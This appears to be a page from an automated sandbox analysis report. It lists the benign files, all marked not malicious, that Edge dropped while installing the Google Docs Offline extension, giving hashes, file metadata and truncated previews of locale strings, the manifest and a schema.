                                                                                                                                                                  SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                  MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                  SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                  SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                  SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                  MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                  SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                  SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                  SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\manifest.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

